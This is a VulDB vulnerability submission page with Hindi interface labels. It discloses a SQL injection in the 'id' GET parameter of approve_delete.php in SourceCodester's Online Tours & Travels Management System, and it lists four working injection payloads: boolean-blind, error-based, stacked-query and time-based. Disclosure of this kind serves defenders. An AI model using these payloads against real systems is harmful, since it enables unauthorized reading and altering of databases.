जमा करें #104752: SourceCodester Online Tours & Travels Management System approve_delete.php sql injectionजानकारी

शीर्षकSourceCodester Online Tours & Travels Management System approve_delete.php sql injection
विवरणSourceCodester Online Tours & Travels Management System approve_delete.php sql injection Url: admin/operations/approve_delete.php Abstract: Line 19 of approve_delete.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is used to dynamically construct a SQL query. In this case, the data is passed to exec() in approve_delete.php on line 19. Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=111' RLIKE (SELECT (CASE WHEN (4667=4667) THEN 111 ELSE 0x28 END))-- lhaO Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=111' AND GTID_SUBSET(CONCAT(0x7178787a71,(SELECT (ELT(8710=8710,1))),0x7162787671),8710)-- bkLB Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=111';SELECT SLEEP(5)# Type: time-based blind Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK) Payload: id=111' AND 6617=BENCHMARK(5000000,MD5(0x594c6e67))-- jult Download Code: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
स्रोत⚠️ https://blog.csdn.net/weixin_43864034/article/details/129729911
उपयोगकर्ता xiaoliang (UID 43581)
सबमिशन23/03/2023 07:22 AM (3 साल पहले)
संयम23/03/2023 08:28 AM (1 hour later)
स्थितिस्वीकृत
VulDB प्रविष्टि223654 [SourceCodester Online Tours & Travels Management System 1.0 approve_delete.php exec पहचान SQL इंजेक्शन]
अंक20

Do you want to use VulDB in your project?

Use the official API to access entries easily!